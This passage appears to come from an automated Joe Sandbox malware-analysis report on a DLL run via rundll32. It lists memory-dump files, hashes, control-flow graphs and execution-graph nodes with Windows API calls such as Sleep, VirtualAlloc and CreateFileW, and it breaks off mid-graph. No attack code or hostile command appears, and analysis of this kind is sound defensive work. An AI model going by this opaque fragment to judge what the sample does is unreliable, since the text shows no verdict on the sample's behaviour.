                    • Associated: 00000004.00000002.1857188513.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857231222.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857274816.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857315399.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857371646.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857414819.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857475324.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857545970.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857600499.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857657485.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857700755.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857700755.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: f2b55a5635ffe03798493215ae9a491c37686f258a2c6a37dfe4f4378f1983c8
                    • Instruction ID: 4a11ff699402e1e4b79fbe227a1ba2f541035c54c3402bb1390fa3f6465090d2
                    • Opcode Fuzzy Hash: f2b55a5635ffe03798493215ae9a491c37686f258a2c6a37dfe4f4378f1983c8
                    • Instruction Fuzzy Hash: 627124713443028FE741CB29DAC8B6ABBE5AF86318F18827AD544CBBC1D7719984C753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C6180 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 61 6c7c6180-6c7c618a 62 6c7c6218-6c7c621b 61->62 63 6c7c6190-6c7c619b 61->63 66 6c7c6488-6c7c648d 62->66 67 6c7c6221-6c7c6233 62->67 64 6c7c619d-6c7c61a6 63->64 65 6c7c61d4-6c7c61ed call 6c7c5c04 63->65 69 6c7c61ac-6c7c61b7 call 6c7c5c04 64->69 70 6c7c61a8-6c7c61aa 64->70 86 6c7c61ef-6c7c61f5 65->86 87 6c7c6213-6c7c6216 65->87 71 6c7c5ab8-6c7c5ad6 66->71 72 6c7c6493-6c7c6495 66->72 73 6c7c6348-6c7c634d 67->73 74 6c7c6239-6c7c623e 67->74 104 6c7c61cf-6c7c61d1 69->104 105 6c7c61b9-6c7c61cd call 6c7c57c0 call 6c7c5f88 69->105 78 6c7c5adc-6c7c5ae5 71->78 79 6c7c5bbb-6c7c5bbf 71->79 81 6c7c6440-6c7c645f call 6c7c5c04 73->81 82 6c7c6353-6c7c635b 73->82 75 6c7c6248-6c7c624e 74->75 76 6c7c6240-6c7c6244 74->76 83 6c7c6265-6c7c6280 75->83 84 6c7c6250-6c7c6256 75->84 88 6c7c5aeb 78->88 89 6c7c5ae7-6c7c5ae9 78->89 90 6c7c5bcb-6c7c5bd6 call 6c7c5c04 79->90 91 6c7c5bc1-6c7c5bc9 79->91 120 6c7c6461-6c7c6467 81->120 121 6c7c6432-6c7c6436 81->121 82->81 93 6c7c6361-6c7c6368 82->93 97 6c7c62c8-6c7c62d5 83->97 98 6c7c6282-6c7c628f 83->98 94 6c7c625c-6c7c6263 84->94 95 6c7c6320-6c7c632b call 6c7c5c04 84->95 99 6c7c61fa-6c7c6211 call 6c7c5f88 86->99 100 6c7c61f7 86->100 101 6c7c5aed-6c7c5b13 VirtualQuery 88->101 89->101 102 6c7c5bfa-6c7c5c03 90->102 139 6c7c5bd8-6c7c5bde 90->139 91->102 106 6c7c636a-6c7c6377 93->106 107 6c7c63c5-6c7c63ca 93->107 94->76 94->83 152 6c7c632d-6c7c6341 call 6c7c57c0 call 6c7c5f88 95->152 153 6c7c6343-6c7c6347 95->153 116 6c7c62d7-6c7c62dd 97->116 117 6c7c62e0-6c7c62ef 97->117 110 6c7c62c0-6c7c62c5 98->110 111 6c7c6291-6c7c629a 98->111 99->87 100->99 114 6c7c5b15-6c7c5b27 101->114 115 6c7c5b83-6c7c5b8e call 6c7c5c04 101->115 105->104 108 6c7c63ac-6c7c63b9 106->108 109 6c7c6379-6c7c6382 106->109 112 6c7c63cc-6c7c63d6 call 6c7c57dc 107->112 113 6c7c63d7-6c7c63fb 107->113 124 6c7c6439 108->124 125 6c7c63bb-6c7c63c3 108->125 109->106 123 6c7c6384-6c7c639c Sleep 109->123 110->97 111->98 126 6c7c629c-6c7c62b2 Sleep 111->126 112->113 128 6c7c63fd-6c7c6404 113->128 129 6c7c6408-6c7c641b 113->129 114->115 130 6c7c5b29-6c7c5b3e 114->130 115->102 163 6c7c5b90-6c7c5b96 115->163 131 6c7c62f6-6c7c6306 116->131 117->131 132 6c7c62f1 call 6c7c57dc 117->132 136 6c7c646c-6c7c6486 call 6c7c5790 call 6c7c5f88 120->136 137 6c7c6469 120->137 123->108 140 6c7c639e-6c7c63a9 Sleep 123->140 124->81 125->107 125->124 126->110 141 6c7c62b4-6c7c62bd Sleep 126->141 143 6c7c6424-6c7c6430 128->143 129->143 146 6c7c641d-6c7c641f call 6c7c581c 129->146 144 6c7c5b40 130->144 145 6c7c5b42-6c7c5b56 VirtualAlloc 130->145 149 6c7c6308-6c7c630d call 6c7c581c 131->149 150 6c7c6312-6c7c631f 131->150 132->131 137->136 156 6c7c5be8-6c7c5bf5 call 6c7c57c0 call 6c7c5f88 139->156 157 6c7c5be0-6c7c5be5 139->157 140->106 141->98 143->121 144->145 145->115 159 6c7c5b58-6c7c5b6c VirtualAlloc 145->159 146->143 149->150 152->153 156->102 157->156 159->115 168 6c7c5b6e-6c7c5b81 159->168 169 6c7c5b98-6c7c5b9d 163->169 170 6c7c5ba0-6c7c5bb9 call 6c7c5790 call 6c7c5f88 163->170 168->102 169->170 170->102
                    Memory Dump Source
                    • Source File: 00000004.00000002.1856298237.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000004.00000002.1856271539.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1856298237.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857188513.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857231222.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857274816.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857315399.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857371646.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857414819.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857475324.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857545970.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857600499.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857657485.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857700755.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857700755.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ea60b9ef0bf18137861c3ac71fbddb7810b44d25914d07aa2ed1a1db3fc3233
                    • Instruction ID: f2c5e0198c3a1b731bd94b34d50d29ae6638226b3bc0050a8b946f17ed47c2a2
                    • Opcode Fuzzy Hash: 1ea60b9ef0bf18137861c3ac71fbddb7810b44d25914d07aa2ed1a1db3fc3233
                    • Instruction Fuzzy Hash: 2CC138627116020FE7048A7CEEC87AEB696DBC5325F58823DE214CBBC6DB75CA459343
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C5C04 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 181 6c7c5c04-6c7c5c16 182 6c7c5c1c-6c7c5c2c 181->182 183 6c7c5e64-6c7c5e69 181->183 184 6c7c5c2e-6c7c5c3b 182->184 185 6c7c5c84-6c7c5c8d 182->185 186 6c7c5f7c-6c7c5f7f 183->186 187 6c7c5e6f-6c7c5e80 183->187 190 6c7c5c3d-6c7c5c4a 184->190 191 6c7c5c54-6c7c5c60 184->191 185->184 192 6c7c5c8f-6c7c5c9b 185->192 188 6c7c5f85-6c7c5f87 186->188 189 6c7c59b0-6c7c59d9 VirtualAlloc 186->189 193 6c7c5e28-6c7c5e35 187->193 194 6c7c5e82-6c7c5e9e 187->194 195 6c7c5a0b-6c7c5a11 189->195 196 6c7c59db-6c7c5a08 call 6c7c5964 189->196 199 6c7c5c4c-6c7c5c50 190->199 200 6c7c5c74-6c7c5c81 190->200 201 6c7c5cd8-6c7c5ce1 191->201 202 6c7c5c62-6c7c5c70 191->202 192->184 204 6c7c5c9d-6c7c5ca9 192->204 193->194 203 6c7c5e37-6c7c5e40 193->203 197 6c7c5eac-6c7c5ebb 194->197 198 6c7c5ea0-6c7c5ea8 194->198 196->195 207 6c7c5ebd-6c7c5ed1 197->207 208 6c7c5ed4-6c7c5edc 197->208 206 6c7c5f08-6c7c5f1e 198->206 209 6c7c5d1c-6c7c5d26 201->209 210 6c7c5ce3-6c7c5cf0 201->210 203->193 211 6c7c5e42-6c7c5e56 Sleep 203->211 204->184 212 6c7c5cab-6c7c5cb7 204->212 220 6c7c5f37-6c7c5f43 206->220 221 6c7c5f20-6c7c5f2e 206->221 207->206 215 6c7c5ede-6c7c5ef6 208->215 216 6c7c5ef8-6c7c5efa call 6c7c58e8 208->216 218 6c7c5d98-6c7c5da4 209->218 219 6c7c5d28-6c7c5d53 209->219 210->209 217 6c7c5cf2-6c7c5cfb 210->217 211->194 222 6c7c5e58-6c7c5e5f Sleep 211->222 212->185 213 6c7c5cb9-6c7c5cc9 Sleep 212->213 213->184 225 6c7c5ccf-6c7c5cd6 Sleep 213->225 226 6c7c5eff-6c7c5f07 215->226 216->226 217->210 227 6c7c5cfd-6c7c5d11 Sleep 217->227 223 6c7c5dcc-6c7c5ddb call 6c7c58e8 218->223 224 6c7c5da6-6c7c5db8 218->224 229 6c7c5d6c-6c7c5d7a 219->229 230 6c7c5d55-6c7c5d63 219->230 232 6c7c5f64 220->232 233 6c7c5f45-6c7c5f58 220->233 221->220 231 6c7c5f30 221->231 222->193 243 6c7c5ded-6c7c5e26 223->243 247 6c7c5ddd-6c7c5de7 223->247 234 6c7c5dbc-6c7c5dca 224->234 235 6c7c5dba 224->235 225->185 227->209 238 6c7c5d13-6c7c5d1a Sleep 227->238 240 6c7c5d7c-6c7c5d96 call 6c7c581c 229->240 241 6c7c5de8 229->241 230->229 239 6c7c5d65 230->239 231->220 236 6c7c5f69-6c7c5f7b 232->236 233->236 242 6c7c5f5a-6c7c5f5f call 6c7c581c 233->242 234->243 235->234 238->210 239->229 240->243 241->243 242->236
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 6C7C5CBB
                    • Sleep.KERNEL32(0000000A,00000000), ref: 6C7C5CD1
                    • Sleep.KERNEL32(00000000), ref: 6C7C5CFF
                    • Sleep.KERNEL32(0000000A,00000000), ref: 6C7C5D15
                    Memory Dump Source
                    • Source File: 00000004.00000002.1856298237.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000004.00000002.1856271539.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1856298237.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857188513.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857231222.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857274816.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857315399.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857371646.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857414819.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857475324.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857545970.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857600499.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857657485.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857700755.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857700755.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: e3c4e3bc7278a8916eb5486ca12de4840350277834837aaa8f53c5b68baf8ce9
                    • Instruction ID: 3ad47697c7567809d0d2c5fc4ed53e3fdf55c7785e0609ed8d820f4237a0854e
                    • Opcode Fuzzy Hash: e3c4e3bc7278a8916eb5486ca12de4840350277834837aaa8f53c5b68baf8ce9
                    • Instruction Fuzzy Hash: 03C163767053428FEB45CF29EAC435ABBF5AB82314F58827ED1148BBC1CBB19440DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:5.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:3.1%
                    Total number of Nodes:1338
                    Total number of Limit Nodes:19
                    execution_graph 12296 6c9d5fdf 12297 6c9d5fe8 12296->12297 12298 6c9d600a 12296->12298 12300 6c8dfb74 94 API calls 12297->12300 12299 6c7cc6e4 16 API calls 12298->12299 12302 6c9d602b 12299->12302 12301 6c9d5ff2 12300->12301 12301->12298 12304 6c7e9010 12301->12304 12305 6c7e9041 12304->12305 12306 6c7e904e GetFileAttributesW 12305->12306 12312 6c7e9063 12305->12312 12308 6c7e9059 12306->12308 12306->12312 12307 6c7e90aa SetFileAttributesW 12309 6c7e90b4 GetLastError 12307->12309 12311 6c7e90bb 12307->12311 12313 6c7e6f8c 12308->12313 12309->12311 12312->12307 12314 6c7e6fa9 12313->12314 12315 6c7e7056 12314->12315 12316 6c7e8c60 7 API calls 12314->12316 12315->12312 12317 6c7e6fba 12316->12317 12317->12315 12318 6c7e8a14 123 API calls 12317->12318 12319 6c7e6fc9 12318->12319 12319->12315 12320 6c7e6fd8 GetFileAttributesW 12319->12320 12320->12315 12321 6c7e6fe3 12320->12321 12321->12315 12322 6c7e700a CreateFileW 12321->12322 12322->12315 12323 6c7e7019 12322->12323 12324 6c7e7033 CloseHandle 12323->12324 12324->12315 12595 6c9d6659 12596 6c9d666c 12595->12596 12597 6c7f0074 64 API calls 12596->12597 12600 6c9d668e 12596->12600 12598 6c9d6689 12597->12598 12599 6c7ca504 11 API calls 12598->12599 12599->12600 12601 6c7ce254 60 API calls 12600->12601 12602 6c9d6772 12601->12602 12603 6c9d67b3 12602->12603 12604 6c7ce254 60 API calls 12602->12604 12613 6c9d80b0 12603->12613 12604->12603 12606 6c9d67f5 12607 6c7cce8c 49 API calls 12606->12607 12610 6c9d6873 12606->12610 12607->12610 12608 6c7cc6e4 16 API calls 12609 6c9d68ae 12608->12609 12611 6c7cc6e4 16 API calls 12609->12611 12610->12608 12612 6c9d68bc 12611->12612 12615 6c9d80c3 12613->12615 12614 6c9d80eb 12617 6c7cce8c 49 API calls 12614->12617 12615->12614 12616 6c7f0074 64 API calls 12615->12616 12618 6c9d80e6 12616->12618 12619 6c9d8103 12617->12619 12620 6c7ca504 11 API calls 12618->12620 12619->12606 12620->12614 11673 6c9d5698 11674 6c7f1e34 63 API calls 11673->11674 11675 6c9d56b9 11674->11675 11676 6c9d56cd 11675->11676 11677 6c9d56ee 11675->11677 11693 6c8dfcfc 11676->11693 11679 6c8dfcfc 76 API calls 11677->11679 11682 6c9d56e1 11679->11682 11680 6c9d575a 11681 6c9d57b3 11680->11681 11688 6c9d5771 11680->11688 11728 6c8b2c8c 11680->11728 11684 6c7cce8c 49 API calls 11681->11684 11682->11680 11711 6c8def8c 11682->11711 11686 6c9d57d6 11684->11686 11687 6c7cc6e4 16 API calls 11686->11687 11687->11688 11689 6c7ccb24 16 API calls 11688->11689 11690 6c9d608b 11689->11690 11691 6c7ce378 16 API calls 11690->11691 11692 6c9d60a6 11691->11692 11692->11692 11694 6c8dfd34 11693->11694 11708 6c8dfd26 11693->11708 11695 6c8dfd96 11694->11695 11694->11708 11731 6c8e05a0 11694->11731 11745 6c8e02a4 11695->11745 11698 6c8dfda3 11698->11708 11755 6c8e0788 11698->11755 11699 6c8dfd55 11700 6c8dfd71 11699->11700 11735 6c7f07e0 11699->11735 11703 6c8e05a0 CompareStringW 11700->11703 11705 6c8dfd7a 11703->11705 11705->11695 11707 6c7f07e0 64 API calls 11705->11707 11709 6c8dfd91 11707->11709 11739 6c7ca504 11709->11739 11779 6c8e0030 11711->11779 11729 6c7f0074 64 API calls 11728->11729 11730 6c8b2ca4 11729->11730 11730->11730 11732 6c8e05b0 11731->11732 11734 6c8e05c6 11732->11734 11758 6c8e0460 11732->11758 11734->11699 11736 6c7f07ec 11735->11736 11737 6c7d17ac 64 API calls 11736->11737 11738 6c7f0816 11737->11738 11740 6c7ca508 11739->11740 11743 6c7ca512 11739->11743 11741 6c7cacf8 11 API calls 11740->11741 11741->11743 11742 6c7ca550 11742->11742 11743->11742 11776 6c7c7220 11743->11776 11746 6c8e02bc 11745->11746 11753 6c8e02f5 11745->11753 11747 6c8e02ea 11746->11747 11749 6c8e05a0 CompareStringW 11746->11749 11748 6c8e0460 CompareStringW 11747->11748 11748->11753 11750 6c8e02ce 11749->11750 11750->11747 11751 6c7f07e0 64 API calls 11750->11751 11752 6c8e02e5 11751->11752 11754 6c7ca504 11 API calls 11752->11754 11753->11698 11754->11747 11756 6c8e079c CompareStringW 11755->11756 11757 6c8e0792 11756->11757 11757->11708 11761 6c8e079c 11758->11761 11762 6c8e07a9 11761->11762 11764 6c8e046d 11761->11764 11767 6c7f72a0 11762->11767 11764->11734 11765 6c8e07b8 11765->11764 11766 6c7f72a0 CompareStringW 11765->11766 11766->11764 11768 6c7f72b5 11767->11768 11770 6c7f72b1 11767->11770 11768->11770 11771 6c7f7238 11768->11771 11770->11765 11772 6c7f724d 11771->11772 11774 6c7f7249 11771->11774 11772->11774 11775 6c7e7700 CompareStringW 11772->11775 11774->11770 11775->11774 11777 6c7d2528 11 API calls 11776->11777 11778 6c7c7225 11777->11778 11778->11742 11780 6c8e0056 11779->11780 11781 6c7f0074 64 API calls 11780->11781 11784 6c8e0073 11780->11784 11782 6c8e006e 11781->11782 11783 6c7ca504 11 API calls 11782->11783 11783->11784 11785 6c8e00a6 SetLastError 11784->11785 11786 6c7f07e0 64 API calls 11784->11786 11796 6c7e9678 11785->11796 11789 6c8e00a1 11786->11789 11788 6c8e00b6 GetLastError 11790 6c8e00e6 11788->11790 11791 6c8e00c1 11788->11791 11792 6c7ca504 11 API calls 11789->11792 11791->11790 11793 6c7ee5b8 2 API calls 11791->11793 11792->11785 11794 6c8e00d2 11793->11794 11795 6c7ca504 11 API calls 11794->11795 11795->11790 11802 6c7cbab4 11796->11802 11799 6c7e96aa 11799->11788 11800 6c7e96b9 11800->11799 11801 6c7e96ce GetFullPathNameW 11800->11801 11801->11799 11803 6c7cbab8 GetFullPathNameW 11802->11803 11803->11799 11803->11800 12621 6c957153 12622 6c95716d 12621->12622 12623 6c7ccb24 16 API calls 12622->12623 12624 6c95717f 12623->12624 11804 6c9d599a 11805 6c9d59a7 11804->11805 11808 6c9d5ab3 11804->11808 11806 6c7ce254 60 API calls 11805->11806 11807 6c9d59c1 11806->11807 11809 6c7f0074 64 API calls 11807->11809 11811 6c9d59f9 11807->11811 11808->11808 11810 6c9d59f4 11809->11810 11812 6c7ca504 11 API calls 11810->11812 11813 6c9d5a5f 11811->11813 11814 6c8b2c8c 64 API calls 11811->11814 11812->11811 11815 6c7cce8c 49 API calls 11813->11815 11814->11813 11816 6c9d5a82 11815->11816 11817 6c7cc6e4 16 API calls 11816->11817 11817->11808 12472 6c9d5e1a 12473 6c9d5e23 12472->12473 12477 6c9d5e3a 12472->12477 12474 6c7f0074 64 API calls 12473->12474 12475 6c9d5e35 12474->12475 12476 6c7ca504 11 API calls 12475->12476 12476->12477 12625 6c7f06b8 12626 6c7f06c8 12625->12626 12627 6c7d17ac 64 API calls 12626->12627 12628 6c7f06f2 12627->12628 12629 6c7d0fba 12632 6c7d08d8 12629->12632 12631 6c7d0fd1 12633 6c7d083c 13 API calls 12632->12633 12634 6c7d0908 12633->12634 12635 6c7d0959 12634->12635 12636 6c7d0968 12634->12636 12641 6c7d0933 12634->12641 12642 6c7d0704 12635->12642 12638 6c7d0704 25 API calls 12636->12638 12639 6c7d0966 12638->12639 12640 6c7d0854 2 API calls 12639->12640 12640->12641 12641->12631 12643 6c7d071b 12642->12643 12644 6c7d0724 12642->12644 12645 6c7c6498 10 API calls 12643->12645 12646 6c7d073e 12644->12646 12647 6c7d0731 12644->12647 12650 6c7d0720 12645->12650 12648 6c7c5c04 10 API calls 12646->12648 12653 6c7c6180 12647->12653 12651 6c7d0743 12648->12651 12650->12639 12703 6c7d06d4 12651->12703 12654 6c7c6218 12653->12654 12655 6c7c6190 12653->12655 12656 6c7c5ab8 12654->12656 12657 6c7c6221 12654->12657 12658 6c7c619d 12655->12658 12659 6c7c61d4 12655->12659 12660 6c7c6493 12656->12660 12666 6c7c5adc VirtualQuery 12656->12666 12667 6c7c5bbb 12656->12667 12661 6c7c6239 12657->12661 12674 6c7c6348 12657->12674 12663 6c7c61a8 12658->12663 12664 6c7c5c04 10 API calls 12658->12664 12662 6c7c5c04 10 API calls 12659->12662 12660->12650 12670 6c7c625c 12661->12670 12675 6c7c6320 12661->12675 12695 6c7c6240 12661->12695 12680 6c7c61eb 12662->12680 12663->12650 12683 6c7c61b5 12664->12683 12665 6c7c63ac 12669 6c7c5c04 10 API calls 12665->12669 12689 6c7c63c5 12665->12689 12677 6c7c5b15 12666->12677 12678 6c7c5b83 12666->12678 12668 6c7c5b6e 12667->12668 12672 6c7c5c04 10 API calls 12667->12672 12668->12650 12692 6c7c645c 12669->12692 12682 6c7c629c Sleep 12670->12682 12670->12695 12671 6c7c6211 12671->12650 12693 6c7c5bd2 12672->12693 12673 6c7c61cd 12673->12650 12674->12665 12681 6c7c6384 Sleep 12674->12681 12674->12689 12679 6c7c5c04 10 API calls 12675->12679 12677->12678 12688 6c7c5b42 VirtualAlloc 12677->12688 12684 6c7c5c04 10 API calls 12678->12684 12697 6c7c6329 12679->12697 12680->12671 12685 6c7c5f88 10 API calls 12680->12685 12681->12665 12686 6c7c639e Sleep 12681->12686 12687 6c7c62b4 Sleep 12682->12687 12682->12695 12683->12673 12690 6c7c5f88 10 API calls 12683->12690 12701 6c7c5b8a 12684->12701 12685->12671 12686->12674 12687->12670 12688->12678 12694 6c7c5b58 VirtualAlloc 12688->12694 12689->12650 12690->12673 12691 6c7c6341 12691->12650 12692->12689 12696 6c7c5f88 10 API calls 12692->12696 12693->12668 12700 6c7c5f88 10 API calls 12693->12700 12694->12668 12694->12678 12695->12650 12699 6c7c6480 12696->12699 12697->12691 12698 6c7c5f88 10 API calls 12697->12698 12698->12691 12699->12650 12700->12668 12701->12668 12702 6c7c5f88 10 API calls 12701->12702 12702->12668 12704 6c7d06da 12703->12704 12705 6c7d0700 12703->12705 12704->12705 12706 6c7c5f88 10 API calls 12704->12706 12705->12650 12706->12705 12707 6c7ca6b0 12708 6c7ca6c1 12707->12708 12710 6c7ca722 12707->12710 12709 6c7ca6ca UnhandledExceptionFilter 12708->12709 12711 6c7ca610 12708->12711 12709->12710 12709->12711 12711->12710 12714 6c7c722c 12711->12714 12715 6c7cacec 11 API calls 12714->12715 12716 6c7c7237 12715->12716 12478 6c9d5813 12479 6c9d5820 12478->12479 12484 6c9d58b0 12478->12484 12480 6c9d5858 12479->12480 12482 6c8b2c8c 64 API calls 12479->12482 12483 6c7cce8c 49 API calls 12480->12483 12481 6c9d5990 12485 6c881884 83 API calls 12481->12485 12482->12480 12486 6c9d587b 12483->12486 12484->12481 12487 6c9d5927 12484->12487 12489 6c8b2c8c 64 API calls 12484->12489 12492 6c9d5b88 12485->12492 12488 6c7cc6e4 16 API calls 12486->12488 12490 6c7cce8c 49 API calls 12487->12490 12488->12484 12489->12487 12491 6c9d594a 12490->12491 12493 6c7cce8c 49 API calls 12491->12493 12495 6c9d5bf9 12492->12495 12496 6c8b2c8c 64 API calls 12492->12496 12494 6c9d5961 12493->12494 12499 6c7cc6e4 16 API calls 12494->12499 12497 6c7cce8c 49 API calls 12495->12497 12496->12495 12498 6c9d5c1c 12497->12498 12500 6c7cce8c 49 API calls 12498->12500 12499->12481 12501 6c9d5c33 12500->12501 12502 6c7cc6e4 16 API calls 12501->12502 12503 6c9d5c68 12502->12503 12504 6c8f9d00 12505 6c8f9d10 12504->12505 12506 6c8f9f22 12505->12506 12521 6c901c0c 12505->12521 12534 6c8f9964 12506->12534 12522 6c901c1e 12521->12522 12523 6c901c44 EnterCriticalSection 12522->12523 12524 6c901c6c 12523->12524 12525 6c901cdc 12523->12525 12527 6c901c76 CoCreateInstance 12524->12527 12526 6c901ce9 LeaveCriticalSection 12525->12526 12527->12526 12528 6c901c95 12527->12528 12529 6c7d17ac 64 API calls 12528->12529 12530 6c901cbb 12529->12530 12531 6c7eff74 75 API calls 12530->12531 12532 6c901cd7 12531->12532 12533 6c7ca504 11 API calls 12532->12533 12533->12525 12535 6c8f9991 12534->12535 12536 6c8f99a9 GetDC 12535->12536 12537 6c8f99bb 12536->12537 12538 6c8f99c0 CreateDIBitmap 12536->12538 12543 6c8f9058 12537->12543 12548 6c8f915c 12538->12548 12541 6c8f99fd 12542 6c8f9a1b DeleteObject 12541->12542 12544 6c7d17ac 64 API calls 12543->12544 12545 6c8f9078 12544->12545 12546 6c7ca504 11 API calls 12545->12546 12547 6c8f908c 12546->12547 12549 6c8f9168 12548->12549 12550 6c8f9163 12548->12550 12549->12541 12552 6c8f90b0 GetLastError 12550->12552 12553 6c8f912e 12552->12553 12554 6c8f90db FormatMessageW 12552->12554 12555 6c8f9058 75 API calls 12553->12555 12554->12553 12557 6c8f90ff 12554->12557 12556 6c8f912c 12555->12556 12558 6c7ca504 11 API calls 12557->12558 12558->12556 12717 6c7fceb0 12718 6c7d17ac 64 API calls 12717->12718 12719 6c7fced0 12718->12719 12720 6c7ca504 11 API calls 12719->12720 12721 6c7fcee4 12720->12721 12722 6c7fa7b0 12723 6c7fa7b9 12722->12723 12723->12723 12724 6c7fa7de EnterCriticalSection 12723->12724 12725 6c7fa923 12723->12725 12726 6c7fa813 12724->12726 12727 6c7fa837 12726->12727 12728 6c7cead0 63 API calls 12726->12728 12729 6c7fa8e6 12727->12729 12730 6c7fa8c0 LoadStringW 12727->12730 12728->12727 12731 6c7fa902 LeaveCriticalSection 12729->12731 12730->12729 12731->12725 12732 6c9d604d 12733 6c9d6065 12732->12733 12734 6c7ccb24 16 API calls 12733->12734 12735 6c9d608b 12734->12735 12736 6c7ce378 16 API calls 12735->12736 12737 6c9d60a6 12736->12737 12737->12737 11818 6c7d106c 11819 6c7d1089 11818->11819 11820 6c7d1072 11818->11820 11820->11819 11822 6c7d09a4 11820->11822 11827 6c7d083c 11822->11827 11826 6c7d0a02 11826->11819 11828 6c7d0845 11827->11828 11829 6c7d0850 11827->11829 11835 6c7c9a54 11828->11835 11829->11826 11831 6c7d0854 11829->11831 11832 6c7d085d 11831->11832 11833 6c7d0865 11831->11833 11868 6c7c9bec 11832->11868 11833->11826 11838 6c7c9a62 11835->11838 11837 6c7c9bdd 11837->11829 11838->11837 11839 6c7c9a8b GetTickCount 11838->11839 11841 6c7c9b34 GetTickCount 11838->11841 11852 6c7c9f14 GetCurrentThreadId 11838->11852 11843 6c7c9a9e 11839->11843 11840 6c7c9afd GetTickCount 11840->11843 11844 6c7c9ab0 11840->11844 11864 6c7c9c58 11841->11864 11842 6c7c9aa3 GetTickCount 11842->11843 11842->11844 11843->11838 11843->11840 11843->11842 11846 6c7c9ad2 GetCurrentThreadId 11843->11846 11857 6c7c9704 11843->11857 11844->11837 11846->11837 11848 6c7c9b5e GetTickCount 11849 6c7c9b44 11848->11849 11849->11841 11849->11848 11850 6c7c9bc8 11849->11850 11850->11837 11851 6c7c9bce GetCurrentThreadId 11850->11851 11851->11837 11853 6c7c9f28 